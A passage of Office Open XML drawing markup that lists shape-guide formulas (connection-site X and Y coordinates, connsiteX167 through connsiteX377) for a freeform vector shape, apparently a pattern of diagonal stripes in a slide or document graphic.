              <a:gd name="connsiteX167" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY167" fmla="*/ 16785763 h 26946982"/>
              <a:gd name="connsiteX168" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY168" fmla="*/ 16418712 h 26946982"/>
              <a:gd name="connsiteX169" fmla="*/ 10528272 w 23952872"/>
              <a:gd name="connsiteY169" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX170" fmla="*/ 10408244 w 23952872"/>
              <a:gd name="connsiteY170" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX171" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY171" fmla="*/ 16538739 h 26946982"/>
              <a:gd name="connsiteX172" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY172" fmla="*/ 16171691 h 26946982"/>
              <a:gd name="connsiteX173" fmla="*/ 10775295 w 23952872"/>
              <a:gd name="connsiteY173" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX174" fmla="*/ 10655268 w 23952872"/>
              <a:gd name="connsiteY174" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX175" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY175" fmla="*/ 16291716 h 26946982"/>
              <a:gd name="connsiteX176" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY176" fmla="*/ 15924665 h 26946982"/>
              <a:gd name="connsiteX177" fmla="*/ 11022319 w 23952872"/>
              <a:gd name="connsiteY177" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX178" fmla="*/ 10902292 w 23952872"/>
              <a:gd name="connsiteY178" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX179" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY179" fmla="*/ 16044692 h 26946982"/>
              <a:gd name="connsiteX180" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY180" fmla="*/ 15677641 h 26946982"/>
              <a:gd name="connsiteX181" fmla="*/ 11269342 w 23952872"/>
              <a:gd name="connsiteY181" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX182" fmla="*/ 11149315 w 23952872"/>
              <a:gd name="connsiteY182" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX183" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY183" fmla="*/ 15797671 h 26946982"/>
              <a:gd name="connsiteX184" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY184" fmla="*/ 15430617 h 26946982"/>
              <a:gd name="connsiteX185" fmla="*/ 11516366 w 23952872"/>
              <a:gd name="connsiteY185" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX186" fmla="*/ 11396339 w 23952872"/>
              <a:gd name="connsiteY186" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX187" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY187" fmla="*/ 15550645 h 26946982"/>
              <a:gd name="connsiteX188" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY188" fmla="*/ 15183594 h 26946982"/>
              <a:gd name="connsiteX189" fmla="*/ 11763389 w 23952872"/>
              <a:gd name="connsiteY189" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX190" fmla="*/ 11643362 w 23952872"/>
              <a:gd name="connsiteY190" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX191" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY191" fmla="*/ 15303622 h 26946982"/>
              <a:gd name="connsiteX192" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY192" fmla="*/ 14936570 h 26946982"/>
              <a:gd name="connsiteX193" fmla="*/ 12010413 w 23952872"/>
              <a:gd name="connsiteY193" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX194" fmla="*/ 11890386 w 23952872"/>
              <a:gd name="connsiteY194" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX195" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY195" fmla="*/ 15056601 h 26946982"/>
              <a:gd name="connsiteX196" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY196" fmla="*/ 14689549 h 26946982"/>
              <a:gd name="connsiteX197" fmla="*/ 12257436 w 23952872"/>
              <a:gd name="connsiteY197" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX198" fmla="*/ 12137409 w 23952872"/>
              <a:gd name="connsiteY198" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX199" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY199" fmla="*/ 14809575 h 26946982"/>
              <a:gd name="connsiteX200" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY200" fmla="*/ 14442523 h 26946982"/>
              <a:gd name="connsiteX201" fmla="*/ 12504459 w 23952872"/>
              <a:gd name="connsiteY201" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX202" fmla="*/ 12384433 w 23952872"/>
              <a:gd name="connsiteY202" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX203" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY203" fmla="*/ 14562548 h 26946982"/>
              <a:gd name="connsiteX204" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY204" fmla="*/ 14195499 h 26946982"/>
              <a:gd name="connsiteX205" fmla="*/ 12751483 w 23952872"/>
              <a:gd name="connsiteY205" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX206" fmla="*/ 12631456 w 23952872"/>
              <a:gd name="connsiteY206" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX207" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY207" fmla="*/ 14315527 h 26946982"/>
              <a:gd name="connsiteX208" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY208" fmla="*/ 13948476 h 26946982"/>
              <a:gd name="connsiteX209" fmla="*/ 12998507 w 23952872"/>
              <a:gd name="connsiteY209" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX210" fmla="*/ 12878479 w 23952872"/>
              <a:gd name="connsiteY210" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX211" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY211" fmla="*/ 14068504 h 26946982"/>
              <a:gd name="connsiteX212" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY212" fmla="*/ 13701450 h 26946982"/>
              <a:gd name="connsiteX213" fmla="*/ 13245530 w 23952872"/>
              <a:gd name="connsiteY213" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX214" fmla="*/ 13125503 w 23952872"/>
              <a:gd name="connsiteY214" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX215" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY215" fmla="*/ 13821481 h 26946982"/>
              <a:gd name="connsiteX216" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY216" fmla="*/ 13454429 h 26946982"/>
              <a:gd name="connsiteX217" fmla="*/ 13492554 w 23952872"/>
              <a:gd name="connsiteY217" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX218" fmla="*/ 13372527 w 23952872"/>
              <a:gd name="connsiteY218" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX219" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY219" fmla="*/ 13574454 h 26946982"/>
              <a:gd name="connsiteX220" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY220" fmla="*/ 13207406 h 26946982"/>
              <a:gd name="connsiteX221" fmla="*/ 13739577 w 23952872"/>
              <a:gd name="connsiteY221" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX222" fmla="*/ 13619550 w 23952872"/>
              <a:gd name="connsiteY222" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX223" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY223" fmla="*/ 13327433 h 26946982"/>
              <a:gd name="connsiteX224" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY224" fmla="*/ 12960382 h 26946982"/>
              <a:gd name="connsiteX225" fmla="*/ 13986601 w 23952872"/>
              <a:gd name="connsiteY225" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX226" fmla="*/ 13866574 w 23952872"/>
              <a:gd name="connsiteY226" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX227" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY227" fmla="*/ 13080409 h 26946982"/>
              <a:gd name="connsiteX228" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY228" fmla="*/ 12713358 h 26946982"/>
              <a:gd name="connsiteX229" fmla="*/ 14233624 w 23952872"/>
              <a:gd name="connsiteY229" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX230" fmla="*/ 14113597 w 23952872"/>
              <a:gd name="connsiteY230" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX231" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY231" fmla="*/ 12833386 h 26946982"/>
              <a:gd name="connsiteX232" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY232" fmla="*/ 12466338 h 26946982"/>
              <a:gd name="connsiteX233" fmla="*/ 14480648 w 23952872"/>
              <a:gd name="connsiteY233" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX234" fmla="*/ 14360621 w 23952872"/>
              <a:gd name="connsiteY234" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX235" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY235" fmla="*/ 12586359 h 26946982"/>
              <a:gd name="connsiteX236" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY236" fmla="*/ 12219312 h 26946982"/>
              <a:gd name="connsiteX237" fmla="*/ 14727671 w 23952872"/>
              <a:gd name="connsiteY237" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX238" fmla="*/ 14607644 w 23952872"/>
              <a:gd name="connsiteY238" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX239" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY239" fmla="*/ 12339339 h 26946982"/>
              <a:gd name="connsiteX240" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY240" fmla="*/ 11972285 h 26946982"/>
              <a:gd name="connsiteX241" fmla="*/ 14974695 w 23952872"/>
              <a:gd name="connsiteY241" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX242" fmla="*/ 14854668 w 23952872"/>
              <a:gd name="connsiteY242" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX243" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY243" fmla="*/ 12092315 h 26946982"/>
              <a:gd name="connsiteX244" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY244" fmla="*/ 11725265 h 26946982"/>
              <a:gd name="connsiteX245" fmla="*/ 15221718 w 23952872"/>
              <a:gd name="connsiteY245" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX246" fmla="*/ 15101691 w 23952872"/>
              <a:gd name="connsiteY246" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX247" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY247" fmla="*/ 11845292 h 26946982"/>
              <a:gd name="connsiteX248" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY248" fmla="*/ 11478241 h 26946982"/>
              <a:gd name="connsiteX249" fmla="*/ 15468742 w 23952872"/>
              <a:gd name="connsiteY249" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX250" fmla="*/ 15348715 w 23952872"/>
              <a:gd name="connsiteY250" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX251" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY251" fmla="*/ 11598268 h 26946982"/>
              <a:gd name="connsiteX252" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY252" fmla="*/ 11231218 h 26946982"/>
              <a:gd name="connsiteX253" fmla="*/ 15715765 w 23952872"/>
              <a:gd name="connsiteY253" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX254" fmla="*/ 15595738 w 23952872"/>
              <a:gd name="connsiteY254" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX255" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY255" fmla="*/ 11351245 h 26946982"/>
              <a:gd name="connsiteX256" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY256" fmla="*/ 10984191 h 26946982"/>
              <a:gd name="connsiteX257" fmla="*/ 15962789 w 23952872"/>
              <a:gd name="connsiteY257" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX258" fmla="*/ 15842762 w 23952872"/>
              <a:gd name="connsiteY258" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX259" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY259" fmla="*/ 11104221 h 26946982"/>
              <a:gd name="connsiteX260" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY260" fmla="*/ 10737170 h 26946982"/>
              <a:gd name="connsiteX261" fmla="*/ 16209812 w 23952872"/>
              <a:gd name="connsiteY261" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX262" fmla="*/ 16089785 w 23952872"/>
              <a:gd name="connsiteY262" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX263" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY263" fmla="*/ 10857198 h 26946982"/>
              <a:gd name="connsiteX264" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY264" fmla="*/ 10490147 h 26946982"/>
              <a:gd name="connsiteX265" fmla="*/ 16456836 w 23952872"/>
              <a:gd name="connsiteY265" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX266" fmla="*/ 16336809 w 23952872"/>
              <a:gd name="connsiteY266" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX267" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY267" fmla="*/ 10610174 h 26946982"/>
              <a:gd name="connsiteX268" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY268" fmla="*/ 10243123 h 26946982"/>
              <a:gd name="connsiteX269" fmla="*/ 16703862 w 23952872"/>
              <a:gd name="connsiteY269" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX270" fmla="*/ 16583838 w 23952872"/>
              <a:gd name="connsiteY270" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX271" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY271" fmla="*/ 10363151 h 26946982"/>
              <a:gd name="connsiteX272" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY272" fmla="*/ 9996100 h 26946982"/>
              <a:gd name="connsiteX273" fmla="*/ 16950889 w 23952872"/>
              <a:gd name="connsiteY273" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX274" fmla="*/ 16830861 w 23952872"/>
              <a:gd name="connsiteY274" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX275" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY275" fmla="*/ 10116127 h 26946982"/>
              <a:gd name="connsiteX276" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY276" fmla="*/ 9749076 h 26946982"/>
              <a:gd name="connsiteX277" fmla="*/ 17197906 w 23952872"/>
              <a:gd name="connsiteY277" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX278" fmla="*/ 17077879 w 23952872"/>
              <a:gd name="connsiteY278" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX279" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY279" fmla="*/ 9869104 h 26946982"/>
              <a:gd name="connsiteX280" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY280" fmla="*/ 9502053 h 26946982"/>
              <a:gd name="connsiteX281" fmla="*/ 17444930 w 23952872"/>
              <a:gd name="connsiteY281" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX282" fmla="*/ 17324903 w 23952872"/>
              <a:gd name="connsiteY282" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX283" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY283" fmla="*/ 9622080 h 26946982"/>
              <a:gd name="connsiteX284" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY284" fmla="*/ 9255029 h 26946982"/>
              <a:gd name="connsiteX285" fmla="*/ 17691953 w 23952872"/>
              <a:gd name="connsiteY285" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX286" fmla="*/ 17571926 w 23952872"/>
              <a:gd name="connsiteY286" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX287" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY287" fmla="*/ 9375057 h 26946982"/>
              <a:gd name="connsiteX288" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY288" fmla="*/ 9008006 h 26946982"/>
              <a:gd name="connsiteX289" fmla="*/ 17938977 w 23952872"/>
              <a:gd name="connsiteY289" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX290" fmla="*/ 17818950 w 23952872"/>
              <a:gd name="connsiteY290" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX291" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY291" fmla="*/ 9128033 h 26946982"/>
              <a:gd name="connsiteX292" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY292" fmla="*/ 8760982 h 26946982"/>
              <a:gd name="connsiteX293" fmla="*/ 18186000 w 23952872"/>
              <a:gd name="connsiteY293" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX294" fmla="*/ 18065973 w 23952872"/>
              <a:gd name="connsiteY294" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX295" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY295" fmla="*/ 8881007 h 26946982"/>
              <a:gd name="connsiteX296" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY296" fmla="*/ 8513959 h 26946982"/>
              <a:gd name="connsiteX297" fmla="*/ 18433024 w 23952872"/>
              <a:gd name="connsiteY297" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX298" fmla="*/ 18312997 w 23952872"/>
              <a:gd name="connsiteY298" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX299" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY299" fmla="*/ 8633986 h 26946982"/>
              <a:gd name="connsiteX300" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY300" fmla="*/ 8266935 h 26946982"/>
              <a:gd name="connsiteX301" fmla="*/ 18680047 w 23952872"/>
              <a:gd name="connsiteY301" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX302" fmla="*/ 18560020 w 23952872"/>
              <a:gd name="connsiteY302" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX303" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY303" fmla="*/ 8386962 h 26946982"/>
              <a:gd name="connsiteX304" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY304" fmla="*/ 8019911 h 26946982"/>
              <a:gd name="connsiteX305" fmla="*/ 18927074 w 23952872"/>
              <a:gd name="connsiteY305" fmla="*/ 26946976 h 26946982"/>
              <a:gd name="connsiteX306" fmla="*/ 18807046 w 23952872"/>
              <a:gd name="connsiteY306" fmla="*/ 26946976 h 26946982"/>
              <a:gd name="connsiteX307" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY307" fmla="*/ 8139941 h 26946982"/>
              <a:gd name="connsiteX308" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY308" fmla="*/ 7772886 h 26946982"/>
              <a:gd name="connsiteX309" fmla="*/ 19174099 w 23952872"/>
              <a:gd name="connsiteY309" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX310" fmla="*/ 19054070 w 23952872"/>
              <a:gd name="connsiteY310" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX311" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY311" fmla="*/ 7892915 h 26946982"/>
              <a:gd name="connsiteX312" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY312" fmla="*/ 7525863 h 26946982"/>
              <a:gd name="connsiteX313" fmla="*/ 19421123 w 23952872"/>
              <a:gd name="connsiteY313" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX314" fmla="*/ 19301096 w 23952872"/>
              <a:gd name="connsiteY314" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX315" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY315" fmla="*/ 7645891 h 26946982"/>
              <a:gd name="connsiteX316" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY316" fmla="*/ 7278839 h 26946982"/>
              <a:gd name="connsiteX317" fmla="*/ 19668144 w 23952872"/>
              <a:gd name="connsiteY317" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX318" fmla="*/ 19548114 w 23952872"/>
              <a:gd name="connsiteY318" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX319" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY319" fmla="*/ 7398868 h 26946982"/>
              <a:gd name="connsiteX320" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY320" fmla="*/ 7031816 h 26946982"/>
              <a:gd name="connsiteX321" fmla="*/ 19915168 w 23952872"/>
              <a:gd name="connsiteY321" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX322" fmla="*/ 19795138 w 23952872"/>
              <a:gd name="connsiteY322" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX323" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY323" fmla="*/ 7151845 h 26946982"/>
              <a:gd name="connsiteX324" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY324" fmla="*/ 6784792 h 26946982"/>
              <a:gd name="connsiteX325" fmla="*/ 20162191 w 23952872"/>
              <a:gd name="connsiteY325" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX326" fmla="*/ 20042161 w 23952872"/>
              <a:gd name="connsiteY326" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX327" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY327" fmla="*/ 6904821 h 26946982"/>
              <a:gd name="connsiteX328" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY328" fmla="*/ 6537769 h 26946982"/>
              <a:gd name="connsiteX329" fmla="*/ 20409215 w 23952872"/>
              <a:gd name="connsiteY329" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX330" fmla="*/ 20289185 w 23952872"/>
              <a:gd name="connsiteY330" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX331" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY331" fmla="*/ 6657797 h 26946982"/>
              <a:gd name="connsiteX332" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY332" fmla="*/ 6290745 h 26946982"/>
              <a:gd name="connsiteX333" fmla="*/ 20656238 w 23952872"/>
              <a:gd name="connsiteY333" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX334" fmla="*/ 20536210 w 23952872"/>
              <a:gd name="connsiteY334" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX335" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY335" fmla="*/ 6410774 h 26946982"/>
              <a:gd name="connsiteX336" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY336" fmla="*/ 6043722 h 26946982"/>
              <a:gd name="connsiteX337" fmla="*/ 20903262 w 23952872"/>
              <a:gd name="connsiteY337" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX338" fmla="*/ 20783233 w 23952872"/>
              <a:gd name="connsiteY338" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX339" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY339" fmla="*/ 6163751 h 26946982"/>
              <a:gd name="connsiteX340" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY340" fmla="*/ 5796695 h 26946982"/>
              <a:gd name="connsiteX341" fmla="*/ 21150288 w 23952872"/>
              <a:gd name="connsiteY341" fmla="*/ 26946976 h 26946982"/>
              <a:gd name="connsiteX342" fmla="*/ 21030257 w 23952872"/>
              <a:gd name="connsiteY342" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX343" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY343" fmla="*/ 5916727 h 26946982"/>
              <a:gd name="connsiteX344" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY344" fmla="*/ 5549674 h 26946982"/>
              <a:gd name="connsiteX345" fmla="*/ 21397309 w 23952872"/>
              <a:gd name="connsiteY345" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX346" fmla="*/ 21277283 w 23952872"/>
              <a:gd name="connsiteY346" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX347" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY347" fmla="*/ 5669703 h 26946982"/>
              <a:gd name="connsiteX348" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY348" fmla="*/ 5302651 h 26946982"/>
              <a:gd name="connsiteX349" fmla="*/ 21644338 w 23952872"/>
              <a:gd name="connsiteY349" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX350" fmla="*/ 21524306 w 23952872"/>
              <a:gd name="connsiteY350" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX351" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY351" fmla="*/ 5422680 h 26946982"/>
              <a:gd name="connsiteX352" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY352" fmla="*/ 5055625 h 26946982"/>
              <a:gd name="connsiteX353" fmla="*/ 21891359 w 23952872"/>
              <a:gd name="connsiteY353" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX354" fmla="*/ 21771333 w 23952872"/>
              <a:gd name="connsiteY354" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX355" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY355" fmla="*/ 5175656 h 26946982"/>
              <a:gd name="connsiteX356" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY356" fmla="*/ 4808604 h 26946982"/>
              <a:gd name="connsiteX357" fmla="*/ 22138379 w 23952872"/>
              <a:gd name="connsiteY357" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX358" fmla="*/ 22018356 w 23952872"/>
              <a:gd name="connsiteY358" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX359" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY359" fmla="*/ 4928633 h 26946982"/>
              <a:gd name="connsiteX360" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY360" fmla="*/ 4561580 h 26946982"/>
              <a:gd name="connsiteX361" fmla="*/ 22385403 w 23952872"/>
              <a:gd name="connsiteY361" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX362" fmla="*/ 22265374 w 23952872"/>
              <a:gd name="connsiteY362" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX363" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY363" fmla="*/ 4681609 h 26946982"/>
              <a:gd name="connsiteX364" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY364" fmla="*/ 4314557 h 26946982"/>
              <a:gd name="connsiteX365" fmla="*/ 22632426 w 23952872"/>
              <a:gd name="connsiteY365" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX366" fmla="*/ 22512398 w 23952872"/>
              <a:gd name="connsiteY366" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX367" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY367" fmla="*/ 4434588 h 26946982"/>
              <a:gd name="connsiteX368" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY368" fmla="*/ 4067533 h 26946982"/>
              <a:gd name="connsiteX369" fmla="*/ 22879450 w 23952872"/>
              <a:gd name="connsiteY369" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX370" fmla="*/ 22759421 w 23952872"/>
              <a:gd name="connsiteY370" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX371" fmla="*/ 0 w 23952872"/>
              <a:gd name="connsiteY371" fmla="*/ 4187559 h 26946982"/>
              <a:gd name="connsiteX372" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY372" fmla="*/ 3820510 h 26946982"/>
              <a:gd name="connsiteX373" fmla="*/ 23126473 w 23952872"/>
              <a:gd name="connsiteY373" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX374" fmla="*/ 23006445 w 23952872"/>
              <a:gd name="connsiteY374" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX375" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY375" fmla="*/ 3940541 h 26946982"/>
              <a:gd name="connsiteX376" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY376" fmla="*/ 3573492 h 26946982"/>
              <a:gd name="connsiteX377" fmla="*/ 23373491 w 23952872"/>
              <a:gd name="connsiteY377" fmla="*/ 26946978 h 26946982"/>
